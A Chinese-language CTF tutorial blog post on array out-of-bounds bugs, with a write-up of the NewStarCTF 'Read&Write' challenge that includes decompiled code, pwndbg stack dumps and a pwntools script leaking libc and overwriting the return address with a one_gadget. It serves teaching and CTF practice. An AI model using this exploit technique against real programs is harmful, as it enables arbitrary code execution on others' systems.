ctf-pwn: 数组越界

原创已于 2024-10-28 22:45:45 修改 · 542 阅读

9 ·

CC 4.0 BY-SA版权

文章标签：

#ctf #pwn

于 2024-10-28 21:59:16 首次发布

1. 基本概念

数组越界（Array Out-of-Bounds）通常发生在以下两种情况下：

访问数组下标小于0的位置。
访问数组下标大于等于数组长度的位置。

2. 示例代码

假设有一个C语言程序：

#include <stdio.h>

void vulnerable_function() {
    int array[5] = {1, 2, 3, 4, 5};
    int i;

    for (i = 0; i <= 5; i++) {  // 注意这里的条件是 i <= 5
        printf("%d\n", array[i]);
    }
}

int main() {
    vulnerable_function();
    return 0;
}

在这个示例中，array数组的长度是5，合法的访问下标应该是0到4。然而，for循环的条件是 i <= 5，这意味着当 i 等于5时，array[i] 将访问到数组边界之外的内存位置。这就是一个典型的数组越界漏洞。

4. 防御措施

边界检查：确保在访问数组元素时进行严格的边界检查。
使用安全函数：一些编程语言和库提供了安全函数，帮助防止数组越界。例如，C++的std==vector==at()方法会进行边界检查。
工具和分析：使用静态和动态分析工具检测程序中的潜在数组越界漏洞。

练习[NewStarCTF 公开赛赛道]Read&Write

查看main

int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int choice; // [rsp+4h] [rbp-41Ch] BYREF
  unsigned int idx; // [rsp+8h] [rbp-418h] BYREF
  unsigned int num_to_write; // [rsp+Ch] [rbp-414h] BYREF
  int nums[256]; // [rsp+10h] [rbp-410h] BYREF
  unsigned __int64 v8; // [rsp+418h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  init();
  menu();
  memset(nums, 0, sizeof(nums));
  while ( 1 )
  {
    printf("> ");
    if ( (int)__isoc99_scanf("%u", &choice) < 0 )
      break;
    if ( choice == 1 )
    {
      printf("Idx:");
      if ( (int)__isoc99_scanf("%u", &idx) < 0 )
        break;
      printf("The num: %u\n", (unsigned int)nums[idx]);
    }
    else
    {
      if ( choice != 2 )
        break;
      printf("Idx:");
      if ( (int)__isoc99_scanf("%u", &idx) < 0 )
        break;
      printf("Num:");
      if ( (int)__isoc99_scanf("%u", &num_to_write) < 0 )
        break;
      nums[idx] = num_to_write;
      puts("Done!");
    }
  }
  puts("Byebye!");
  return 0;
}

很明显的数组越界,我们来找一下偏移

Idx:256

Breakpoint 2, 0x0000555555400a23 in main () at Read&Write.c:38
38	in Read&Write.c
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
─────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────
 RAX  0
 RBX  0x555555400af0 (__libc_csu_init) ◂— push r15
 RCX  0
 RDX  0
 RDI  0x555555400be2 ◂— push rsp /* 'The num: %u\n' */
 RSI  0xffffc370
 R8   0xa
 R9   0
 R10  0x7ffff7f70ac0 ◂— 0x100000000
 R11  0x7ffff7f713c0 ◂— 0x2000200020002
 R12  0x5555554007a0 (_start) ◂— xor ebp, ebp
 R13  0x7fffffffc370 ◂— 1
 R14  0
 R15  0
 RBP  0x7fffffffc280 ◂— 0
 RSP  0x7fffffffbe60 ◂— 0x1ffffbef4
 RIP  0x555555400a23 (main+225) ◂— call 0x555555400750
──────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────
 ► 0x555555400a23 <main+225>    call   printf@plt                  <printf@plt>
        format: 0x555555400be2 ◂— 'The num: %u\n'
        vararg: 0xffffc370
 
   0x555555400a28 <main+230>    jmp    main+367                    <main+367>
    ↓
   0x555555400ab1 <main+367>    jmp    main+71                     <main+71>
    ↓
   0x555555400989 <main+71>     lea    rdi, [rip + 0x247]     RDI => 0x555555400bd7 ◂— and byte ptr ds:[rax], al /* '> ' */
   0x555555400990 <main+78>     mov    eax, 0                 EAX => 0
   0x555555400995 <main+83>     call   printf@plt                  <printf@plt>
 
   0x55555540099a <main+88>     lea    rax, [rbp - 0x41c]
   0x5555554009a1 <main+95>     mov    rsi, rax
   0x5555554009a4 <main+98>     lea    rdi, [rip + 0x22f]     RDI => 0x555555400bda ◂— and eax, 0x64490075 /* '%u' */
   0x5555554009ab <main+105>    mov    eax, 0                 EAX => 0
   0x5555554009b0 <main+110>    call   __isoc99_scanf@plt          <__isoc99_scanf@plt>
────────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffbe60 ◂— 0x1ffffbef4
01:0008│-418 0x7fffffffbe68 ◂— 0x7fff00000100
02:0010│-410 0x7fffffffbe70 ◂— 0
... ↓        5 skipped
──────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
 ► 0   0x555555400a23 main+225
   1   0x7ffff7df9083 __libc_start_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 200
00:0000│ rsp 0x7fffffffbe60 ◂— 0x1ffffbef4
01:0008│-418 0x7fffffffbe68 ◂— 0x7fff00000100
02:0010│-410 0x7fffffffbe70 ◂— 0
... ↓        127 skipped
82:0410│-010 0x7fffffffc270 —▸ 0x7fffffffc370 ◂— 1
83:0418│-008 0x7fffffffc278 ◂— 0x8c8da80a4deecc00
84:0420│ rbp 0x7fffffffc280 ◂— 0
85:0428│+008 0x7fffffffc288 —▸ 0x7ffff7df9083 (__libc_start_main+243) ◂— mov edi, eax
86:0430│+010 0x7fffffffc290 —▸ 0x7ffff7ffc620 (_rtld_global_ro) ◂— 0x50fa300000000
87:0438│+018 0x7fffffffc298 —▸ 0x7fffffffc378 —▸ 0x7fffffffc74a ◂— '/home/a5rz/Desktop/pwn/file/pwn'
88:0440│+020 0x7fffffffc2a0 ◂— 0x100000000
89:0448│+028 0x7fffffffc2a8 —▸ 0x555555400942 (main) ◂— push rbp
8a:0450│+030 0x7fffffffc2b0 —▸ 0x555555400af0 (__libc_csu_init) ◂— push r15
8b:0458│+038 0x7fffffffc2b8 ◂— 0xf489a56c1b84c028
8c:0460│+040 0x7fffffffc2c0 —▸ 0x5555554007a0 (_start) ◂— xor ebp, ebp
8d:0468│+048 0x7fffffffc2c8 —▸ 0x7fffffffc370 ◂— 1
8e:0470│+050 0x7fffffffc2d0 ◂— 0
8f:0478│+058 0x7fffffffc2d8 ◂— 0
90:0480│+060 0x7fffffffc2e0 ◂— 0xb765a939ea4c028
91:0488│+068 0x7fffffffc2e8 ◂— 0xb764ad33beac028
92:0490│+070 0x7fffffffc2f0 ◂— 0
... ↓        2 skipped
95:04a8│+088 0x7fffffffc308 ◂— 1
96:04b0│+090 0x7fffffffc310 —▸ 0x7fffffffc378 —▸ 0x7fffffffc74a ◂— '/home/a5rz/Desktop/pwn/file/pwn'
97:04b8│+098 0x7fffffffc318 —▸ 0x7fffffffc388 —▸ 0x7fffffffc76a ◂— 'LC_NAME=zh_CN.UTF-8'
98:04c0│+0a0 0x7fffffffc320 —▸ 0x7ffff7ffe190 —▸ 0x555555400000 ◂— jg 0x555555400047

02:0010│-410 0x7fffffffbe70 ◂— 0
... ↓        127 skipped

128*2->256数组从0开始所以256是第一个参数
接下来看看保护

[*] '/home/a5rz/Desktop/pwn/file/pwn'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No
    Debuginfo:  Yes

尝试ogg

def out_add(idx):
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b'Idx:', str(idx))
    io.recvuntil(b'num:')
    part_1 = int(io.recvuntil(b'\n')[:-1], 10)
    print(hex(part_1))
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b'Idx:', str(idx + 1))
    io.recvuntil(b'num:')
    part_2 = int(io.recvuntil(b'\n')[:-1], 10)
    print(hex(part_2))
    adder = int(str(hex(part_2))[2:] + str(hex(part_1))[2:], 16)
    print(hex(adder))
    return adder


def write_add(idx, adder):
    adder = p64(adder)
    low = int.from_bytes(adder[:4], byteorder='little')
    high = int.from_bytes(adder[4:], byteorder='little')
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b'Idx:', str(idx))
    io.sendlineafter(b'Num:', str(low))
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b'Idx:', str(idx + 1))
    io.sendlineafter(b'Num:', str(high))


adder = out_add(262)
libc_base = adder - (libc.sym['__libc_start_main'] + 243)
print(f'---------->{hex(libc_base)}')
ogg = [0xe3afe, 0xe3b01, 0xe3b04]
go_addr = libc_base + ogg[1]
write_add(262, go_addr)

io.sendlineafter(b'> ', b'0')